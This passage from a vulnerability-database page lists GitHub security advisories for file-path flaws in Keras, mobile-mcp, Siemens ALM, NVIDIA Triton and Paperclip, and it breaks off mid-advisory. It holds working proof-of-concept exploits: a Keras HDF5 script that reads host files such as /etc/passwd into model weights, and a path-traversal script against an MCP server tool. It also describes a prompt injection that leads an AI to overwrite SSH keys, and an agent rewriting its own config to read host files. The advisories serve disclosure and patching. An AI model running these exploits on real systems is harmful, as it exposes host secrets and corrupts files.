  9. Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.

Workarounds

  • Avoid loading untrusted HDF5 weight files.
  • Pre-scan weight files using h5py to detect external datasets or links before invoking Keras loaders.
  • Prefer alternate formats (e.g., NumPy .npz) that lack external reference capabilities when exchanging weights.
  • If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.

Timeline (UTC)

  • 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
  • 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented safe_keras_hdf5.py prototype guard.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.13.0"
            },
            {
              "fixed": "3.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.12.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:41:58Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 \u201cexternal storage\u201d and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras \u201csafe mode\u201d only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact\u2014perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. **Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/\u003cuser\u003e/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n   - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n   - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n   - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025\u201110\u201119)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n  - `tensorflow==2.20.0`\n  - `keras==3.11.3`\n  - `h5py==3.15.1`\n  - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -\u003e Path:\n    candidates = [\n        os.environ.get(\"KFLI_PATH\"),\n        \"/etc/machine-id\",\n        \"/etc/hostname\",\n        \"/proc/sys/kernel/hostname\",\n        \"/etc/passwd\",\n    ]\n    for candidate in candidates:\n        if not candidate:\n            continue\n        path = Path(candidate)\n        if path.exists() and path.is_file():\n            return path\n    raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -\u003e tf.keras.Model:\n    model = tf.keras.Sequential([\n        tf.keras.layers.Input(shape=(1,), name=\"input\"),\n        tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n    ])\n    model(tf.zeros((1, 1)))  # build weights\n    return model\n\ndef find_bias_dataset(h5file: h5py.File) -\u003e str:\n    matches: list[str] = []\n    def visit(name: str, obj) -\u003e None:\n        if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n            matches.append(name)\n    h5file.visititems(visit)\n    if not matches:\n        raise RuntimeError(\"bias dataset not found\")\n    return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -\u003e tuple[int, int]:\n    with h5py.File(path, \"r+\") as h5file:\n        bias_path = find_bias_dataset(h5file)\n        parent = h5file[str(Path(bias_path).parent)]\n        dset_name = Path(bias_path).name\n        del parent[dset_name]\n        max_bytes = 128\n        size = host_file.stat().st_size\n        nbytes = min(size, max_bytes)\n        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing\n        units = max(1, nbytes // 4)\n        parent.create_dataset(\n            dset_name,\n            shape=(units,),\n            dtype=\"float32\",\n            external=[(host_file.as_posix(), 0, nbytes)],\n        )\n        return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -\u003e tuple[str, str]:\n    raw = np.ascontiguousarray(arr).view(np.uint8)\n    ascii_preview = bytes(b if 32 \u003c= b \u003c 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n    hex_preview = raw[:64].tobytes().hex()\n    return ascii_preview, hex_preview\n\ndef main() -\u003e None:\n    host_file = choose_host_file()\n    model = build_model(units=32)\n\n    weights_path = Path(\"weights_demo.h5\")\n    model.save_weights(weights_path.as_posix())\n\n    units, nbytes = rewrite_bias_external(weights_path, host_file)\n    print(\"secret_text_source\", host_file)\n    print(\"units\", units, \"bytes_mapped\", nbytes)\n\n    model.load_weights(weights_path.as_posix())\n    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n    ascii_preview, hex_preview = floats_to_ascii(output)\n    print(\"recovered_ascii\", ascii_preview)\n    print(\"recovered_hex64\", hex_preview)\n\n    saved = Path(\"weights_demo_resaved.h5\")\n    model.save_weights(saved.as_posix())\n    print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n    main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n   - `secret_text_source` prints the chosen host file path.\n   - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n   - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n  1. **External storage dataset**: dataset references `/etc/hosts`.\n  2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n  3. **Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n   - Inspect creation property lists (`get_external_count`) before materialising tensors.\n   - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n   - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n   - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. **Regression coverage**:\n   - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025\u201110\u201118**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025\u201110\u201119**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.",
  "id": "GHSA-3m4q-jmj6-r34q",
  "modified": "2026-02-18T22:41:58Z",
  "published": "2026-02-18T22:41:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/22057"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading"
}

GHSA-3MF9-JJRH-XQV8

Vulnerability from github – Published: 2023-01-10 12:30 – Updated: 2024-04-09 09:31
VLAI
Details

A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions < V6.0 SP9 Upd4). The affected components allow to rename license files with user chosen input without authentication. This could allow an unauthenticated remote attacker to rename and move files as SYSTEM user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-43513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-610",
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-10T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions \u003c V6.0 SP9 Upd4). The affected components allow to rename license files with user chosen input without authentication. This could allow an unauthenticated remote attacker to rename and move files as SYSTEM user.",
  "id": "GHSA-3mf9-jjrh-xqv8",
  "modified": "2024-04-09T09:31:07Z",
  "published": "2023-01-10T12:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43513"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-476715.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-556635.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-476715.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3P2M-H2V6-G9MX

Vulnerability from github – Published: 2026-03-27 19:13 – Updated: 2026-03-30 20:18
VLAI
Summary
@mobilenext/mobile-mcp alllows arbitrary file write via Path Traversal in mobile screen capture tools
Details

Summary

The @mobilenext/mobile-mcp server contains a Path Traversal vulnerability in the mobile_save_screenshot and mobile_start_screen_recording tools. The saveTo and output parameters were passed directly to filesystem operations without validation, allowing an attacker to write files outside the intended workspace.

Details

File: src/server.ts (lines 584-592)

tool(
    "mobile_save_screenshot",
    "Save Screenshot",
    "Save a screenshot of the mobile device to a file",
    {
        device: z.string().describe("The device identifier..."),
        saveTo: z.string().describe("The path to save the screenshot to"),
    },
    { destructiveHint: true },
    async ({ device, saveTo }) => {
        const robot = getRobotFromDevice(device);
        const screenshot = await robot.getScreenshot();
        fs.writeFileSync(saveTo, screenshot); // ← VULNERABLE: No path validation
        return `Screenshot saved to: ${saveTo}`;
    },
);

Root Cause

The saveTo parameter is passed directly to fs.writeFileSync() without any validation. The codebase has validation functions for other parameters (validatePackageName, validateLocale in src/utils.ts) but no path validation function exists.

Additional Affected Tool

File: src/server.ts (lines 597-620)

The mobile_start_screen_recording tool has the same vulnerability in its output parameter.

PoC

#!/usr/bin/env python3

import json
import os
import subprocess
import sys
import time
from datetime import datetime

SERVER_CMD = ["npx", "-y", "@mobilenext/mobile-mcp@latest"]
STARTUP_DELAY = 4
REQUEST_DELAY = 0.5


def log(level, msg):
    print(f"[{level.upper()}] {msg}")


def send_jsonrpc(proc, msg, timeout=REQUEST_DELAY):
    """Send JSON-RPC message and receive response."""
    try:
        proc.stdin.write(json.dumps(msg) + "\n")
        proc.stdin.flush()
        time.sleep(timeout)
        line = proc.stdout.readline()
        return json.loads(line) if line else None
    except Exception as e:
        log("error", f"Communication error: {e}")
        return None


def send_notification(proc, method, params=None):
    """Send JSON-RPC notification (no response expected)."""
    msg = {"jsonrpc": "2.0", "method": method}
    if params:
        msg["params"] = params
    proc.stdin.write(json.dumps(msg) + "\n")
    proc.stdin.flush()


def start_server():
    """Start the mobile-mcp server."""
    log("info", "Starting mobile-mcp server...")

    try:
        proc = subprocess.Popen(
            SERVER_CMD,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )
        time.sleep(STARTUP_DELAY)

        if proc.poll() is not None:
            stderr = proc.stderr.read()
            log("error", f"Server failed to start: {stderr[:200]}")
            return None

        log("info", f"Server started (PID: {proc.pid})")
        return proc

    except FileNotFoundError:
        log("error", "npx not found. Please install Node.js")
        return None


def initialize_session(proc):
    """Initialize MCP session with handshake."""
    log("info", "Initializing MCP session...")

    resp = send_jsonrpc(
        proc,
        {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "initialize",
            "params": {
                "protocolVersion": "2024-11-05",
                "capabilities": {},
                "clientInfo": {"name": "mcpsec-exploit", "version": "1.0"},
            },
        },
    )

    if not resp or "error" in resp:
        log("error", f"Initialize failed: {resp}")
        return False

    send_notification(proc, "notifications/initialized")
    time.sleep(0.5)

    server_info = resp.get("result", {}).get("serverInfo", {})
    log("info", f"Session initialized - Server: {server_info.get('name')} v{server_info.get('version')}")
    return True


def get_devices(proc):
    """Get list of connected devices."""
    log("info", "Enumerating connected devices...")

    resp = send_jsonrpc(
        proc,
        {
            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {"name": "mobile_list_available_devices", "arguments": {}},
        },
    )

    if resp:
        content = resp.get("result", {}).get("content", [{}])[0].get("text", "")
        try:
            devices = json.loads(content).get("devices", [])
            return devices
        except:
            log("warning", f"Could not parse device list: {content[:100]}")

    return []


def exploit_path_traversal(proc, device_id, target_path):
    """Execute path traversal exploit."""
    log("info", f"Target path: {target_path}")

    resp = send_jsonrpc(
        proc,
        {
            "jsonrpc": "2.0",
            "id": 100,
            "method": "tools/call",
            "params": {
                "name": "mobile_save_screenshot",
                "arguments": {"device": device_id, "saveTo": target_path},
            },
        },
        timeout=2,
    )

    if resp:
        content = resp.get("result", {}).get("content", [{}])
        if isinstance(content, list) and content:
            text = content[0].get("text", "")
            log("info", f"Server response: {text[:100]}")

            check_path = target_path
            if target_path.startswith(".."):
                check_path = os.path.normpath(os.path.join(os.getcwd(), target_path))

            if os.path.exists(check_path):
                size = os.path.getsize(check_path)
                log("info", f"FILE WRITTEN: {check_path} ({size} bytes)")
                return True, check_path, size
            elif "Screenshot saved" in text:
                log("info", f"Server confirmed write (file may be at relative path)")
                return True, target_path, 0

    log("warning", "Exploit may have failed or file not accessible")
    return False, target_path, 0


def main():
    device_id = sys.argv[1] if len(sys.argv) > 1 else None

    proc = start_server()
    if not proc:
        sys.exit(1)

    try:
        if not initialize_session(proc):
            sys.exit(1)

        if not device_id:
            devices = get_devices(proc)
            if devices:
                log("info", f"Found {len(devices)} device(s):")
                for d in devices:
                    print(f"  - {d.get('id')} - {d.get('name')} ({d.get('platform')}, {d.get('state')})")
                device_id = devices[0].get("id")
                log("info", f"Using device: {device_id}")
            else:
                log("error", "No devices found. Please connect a device and try again.")
                log("info", "Usage: python3 exploit.py <device_id>")
                sys.exit(1)

        home = os.path.expanduser("~")

        exploits = [
            "../../exploit_2_traversal.png",
            f"{home}/exploit.png",
            f"{home}/.poc_dotfile",
        ]

        results = []
        for target in exploits:
            success, path, size = exploit_path_traversal(proc, device_id, target)
            results.append((target, success, path, size))

    finally:
        proc.terminate()
        log("info", "Server terminated.")


if __name__ == "__main__":
    main()

Impact

A Prompt Injection attack from a malicious website or document could trick the AI into overwriting sensitive host files (e.g., ~/.bashrc, ~/.ssh/authorized_keys, or .config files) leading to a broken shell.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@mobilenext/mobile-mcp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.49"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33989"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T19:13:17Z",
    "nvd_published_at": "2026-03-27T22:16:22Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `@mobilenext/mobile-mcp` server contains a Path Traversal vulnerability in the `mobile_save_screenshot` and `mobile_start_screen_recording` tools. The `saveTo` and `output` parameters were passed directly to filesystem operations without validation, allowing an attacker to write files outside the intended workspace.\n\n### Details\n**File:** `src/server.ts` (lines 584-592)\n\n```typescript\ntool(\n    \"mobile_save_screenshot\",\n    \"Save Screenshot\",\n    \"Save a screenshot of the mobile device to a file\",\n    {\n        device: z.string().describe(\"The device identifier...\"),\n        saveTo: z.string().describe(\"The path to save the screenshot to\"),\n    },\n    { destructiveHint: true },\n    async ({ device, saveTo }) =\u003e {\n        const robot = getRobotFromDevice(device);\n        const screenshot = await robot.getScreenshot();\n        fs.writeFileSync(saveTo, screenshot); // \u2190 VULNERABLE: No path validation\n        return `Screenshot saved to: ${saveTo}`;\n    },\n);\n```\n\n### Root Cause\n\nThe `saveTo` parameter is passed directly to `fs.writeFileSync()` without any validation. The codebase has validation functions for other parameters (`validatePackageName`, `validateLocale` in `src/utils.ts`) but **no path validation function exists**.\n\n### Additional Affected Tool\n\n**File:** `src/server.ts` (lines 597-620)\n\nThe `mobile_start_screen_recording` tool has the same vulnerability in its `output` parameter.\n\n### PoC\n```py\n#!/usr/bin/env python3\n\nimport json\nimport os\nimport subprocess\nimport sys\nimport time\nfrom datetime import datetime\n\nSERVER_CMD = [\"npx\", \"-y\", \"@mobilenext/mobile-mcp@latest\"]\nSTARTUP_DELAY = 4\nREQUEST_DELAY = 0.5\n\n\ndef log(level, msg):\n    print(f\"[{level.upper()}] {msg}\")\n\n\ndef send_jsonrpc(proc, msg, timeout=REQUEST_DELAY):\n    \"\"\"Send JSON-RPC message and receive response.\"\"\"\n    try:\n        proc.stdin.write(json.dumps(msg) + \"\\n\")\n        proc.stdin.flush()\n        time.sleep(timeout)\n        line = proc.stdout.readline()\n        return json.loads(line) if line else None\n    except Exception as e:\n        log(\"error\", f\"Communication error: {e}\")\n        return None\n\n\ndef send_notification(proc, method, params=None):\n    \"\"\"Send JSON-RPC notification (no response expected).\"\"\"\n    msg = {\"jsonrpc\": \"2.0\", \"method\": method}\n    if params:\n        msg[\"params\"] = params\n    proc.stdin.write(json.dumps(msg) + \"\\n\")\n    proc.stdin.flush()\n\n\ndef start_server():\n    \"\"\"Start the mobile-mcp server.\"\"\"\n    log(\"info\", \"Starting mobile-mcp server...\")\n\n    try:\n        proc = subprocess.Popen(\n            SERVER_CMD,\n            stdin=subprocess.PIPE,\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE,\n            text=True,\n        )\n        time.sleep(STARTUP_DELAY)\n\n        if proc.poll() is not None:\n            stderr = proc.stderr.read()\n            log(\"error\", f\"Server failed to start: {stderr[:200]}\")\n            return None\n\n        log(\"info\", f\"Server started (PID: {proc.pid})\")\n        return proc\n\n    except FileNotFoundError:\n        log(\"error\", \"npx not found. Please install Node.js\")\n        return None\n\n\ndef initialize_session(proc):\n    \"\"\"Initialize MCP session with handshake.\"\"\"\n    log(\"info\", \"Initializing MCP session...\")\n\n    resp = send_jsonrpc(\n        proc,\n        {\n            \"jsonrpc\": \"2.0\",\n            \"id\": 1,\n            \"method\": \"initialize\",\n            \"params\": {\n                \"protocolVersion\": \"2024-11-05\",\n                \"capabilities\": {},\n                \"clientInfo\": {\"name\": \"mcpsec-exploit\", \"version\": \"1.0\"},\n            },\n        },\n    )\n\n    if not resp or \"error\" in resp:\n        log(\"error\", f\"Initialize failed: {resp}\")\n        return False\n\n    send_notification(proc, \"notifications/initialized\")\n    time.sleep(0.5)\n\n    server_info = resp.get(\"result\", {}).get(\"serverInfo\", {})\n    log(\"info\", f\"Session initialized - Server: {server_info.get(\u0027name\u0027)} v{server_info.get(\u0027version\u0027)}\")\n    return True\n\n\ndef get_devices(proc):\n    \"\"\"Get list of connected devices.\"\"\"\n    log(\"info\", \"Enumerating connected devices...\")\n\n    resp = send_jsonrpc(\n        proc,\n        {\n            \"jsonrpc\": \"2.0\",\n            \"id\": 2,\n            \"method\": \"tools/call\",\n            \"params\": {\"name\": \"mobile_list_available_devices\", \"arguments\": {}},\n        },\n    )\n\n    if resp:\n        content = resp.get(\"result\", {}).get(\"content\", [{}])[0].get(\"text\", \"\")\n        try:\n            devices = json.loads(content).get(\"devices\", [])\n            return devices\n        except:\n            log(\"warning\", f\"Could not parse device list: {content[:100]}\")\n\n    return []\n\n\ndef exploit_path_traversal(proc, device_id, target_path):\n    \"\"\"Execute path traversal exploit.\"\"\"\n    log(\"info\", f\"Target path: {target_path}\")\n\n    resp = send_jsonrpc(\n        proc,\n        {\n            \"jsonrpc\": \"2.0\",\n            \"id\": 100,\n            \"method\": \"tools/call\",\n            \"params\": {\n                \"name\": \"mobile_save_screenshot\",\n                \"arguments\": {\"device\": device_id, \"saveTo\": target_path},\n            },\n        },\n        timeout=2,\n    )\n\n    if resp:\n        content = resp.get(\"result\", {}).get(\"content\", [{}])\n        if isinstance(content, list) and content:\n            text = content[0].get(\"text\", \"\")\n            log(\"info\", f\"Server response: {text[:100]}\")\n\n            check_path = target_path\n            if target_path.startswith(\"..\"):\n                check_path = os.path.normpath(os.path.join(os.getcwd(), target_path))\n\n            if os.path.exists(check_path):\n                size = os.path.getsize(check_path)\n                log(\"info\", f\"FILE WRITTEN: {check_path} ({size} bytes)\")\n                return True, check_path, size\n            elif \"Screenshot saved\" in text:\n                log(\"info\", f\"Server confirmed write (file may be at relative path)\")\n                return True, target_path, 0\n\n    log(\"warning\", \"Exploit may have failed or file not accessible\")\n    return False, target_path, 0\n\n\ndef main():\n    device_id = sys.argv[1] if len(sys.argv) \u003e 1 else None\n\n    proc = start_server()\n    if not proc:\n        sys.exit(1)\n\n    try:\n        if not initialize_session(proc):\n            sys.exit(1)\n\n        if not device_id:\n            devices = get_devices(proc)\n            if devices:\n                log(\"info\", f\"Found {len(devices)} device(s):\")\n                for d in devices:\n                    print(f\"  - {d.get(\u0027id\u0027)} - {d.get(\u0027name\u0027)} ({d.get(\u0027platform\u0027)}, {d.get(\u0027state\u0027)})\")\n                device_id = devices[0].get(\"id\")\n                log(\"info\", f\"Using device: {device_id}\")\n            else:\n                log(\"error\", \"No devices found. Please connect a device and try again.\")\n                log(\"info\", \"Usage: python3 exploit.py \u003cdevice_id\u003e\")\n                sys.exit(1)\n\n        home = os.path.expanduser(\"~\")\n\n        exploits = [\n            \"../../exploit_2_traversal.png\",\n            f\"{home}/exploit.png\",\n            f\"{home}/.poc_dotfile\",\n        ]\n\n        results = []\n        for target in exploits:\n            success, path, size = exploit_path_traversal(proc, device_id, target)\n            results.append((target, success, path, size))\n\n    finally:\n        proc.terminate()\n        log(\"info\", \"Server terminated.\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Impact\nA Prompt Injection attack from a malicious website or document could trick the AI into overwriting sensitive host files (e.g., `~/.bashrc`, `~/.ssh/authorized_keys`, or `.config` files) leading to a broken shell.",
  "id": "GHSA-3p2m-h2v6-g9mx",
  "modified": "2026-03-30T20:18:39Z",
  "published": "2026-03-27T19:13:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mobile-next/mobile-mcp/security/advisories/GHSA-3p2m-h2v6-g9mx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33989"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mobile-next/mobile-mcp/commit/f5e32295903128c1e71cf915ae6c0b76c7b0153b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mobile-next/mobile-mcp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mobile-next/mobile-mcp/releases/tag/0.0.49"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@mobilenext/mobile-mcp alllows arbitrary file write via Path Traversal in mobile screen capture tools"
}

GHSA-3PGG-FXM7-XV3P

Vulnerability from github – Published: 2024-05-14 15:32 – Updated: 2024-05-14 15:32
VLAI
Details

NVIDIA Triton Inference Server for Linux contains a vulnerability where a user can set the logging location to an arbitrary file. If this file exists, logs are appended to the file. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0087"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-14T14:39:28Z",
    "severity": "CRITICAL"
  },
  "details": "NVIDIA Triton Inference Server for Linux contains a vulnerability where a user can set the logging location to an arbitrary file. If this file exists, logs are appended to the file. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.",
  "id": "GHSA-3pgg-fxm7-xv3p",
  "modified": "2024-05-14T15:32:51Z",
  "published": "2024-05-14T15:32:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0087"
    },
    {
      "type": "WEB",
      "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5535"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3PW3-V88X-XJ24

Vulnerability from github – Published: 2026-04-16 22:45 – Updated: 2026-04-16 22:45
VLAI
Summary
Paperclip: Arbitrary File Read via Agent-Controlled adapterConfig.instructionsFilePath
Details

Summary

Paperclip contains an arbitrary file read vulnerability that allows an attacker with an Agent API key to read files from the Paperclip server host filesystem. The vulnerability occurs because agents are allowed to modify their own adapterConfig through the /agents/:id API endpoint. The configuration field adapterConfig.instructionsFilePath is later read directly by the server runtime using fs.readFile(). Because no validation or path restriction is applied, an attacker can supply an arbitrary filesystem path. The Paperclip server then attempts to read that path from the host filesystem during agent execution. This breaks the intended trust boundary between agent runtime configuration and server host filesystem access, allowing a compromised or malicious agent to access sensitive files on the host system.

Details

Root Cause

No path normalization, allowlist, or workspace boundary validation is applied before the filesystem read occurs. Agent configuration can be modified through the API endpoint:

PATCH /api/agents/:id

The validation schema allows arbitrary configuration fields inside adapterConfig. File:

packages/shared/src/validators/agent.ts

Schema fragment:

adapterConfig: z.record(z.unknown())

Because of this schema, attackers can inject arbitrary configuration values, including:

adapterConfig.instructionsFilePath

During agent execution, the server runtime reads this path directly from the host filesystem using fs.readFile(). Relevant code path:

packages/adapters/claude-local/src/server/execute.ts

Execution flow:

adapterConfig.instructionsFilePath
        ↓
execute()
        ↓
fs.readFile(instructionsFilePath)
        ↓
file content loaded into runtime

Vulnerable logic:

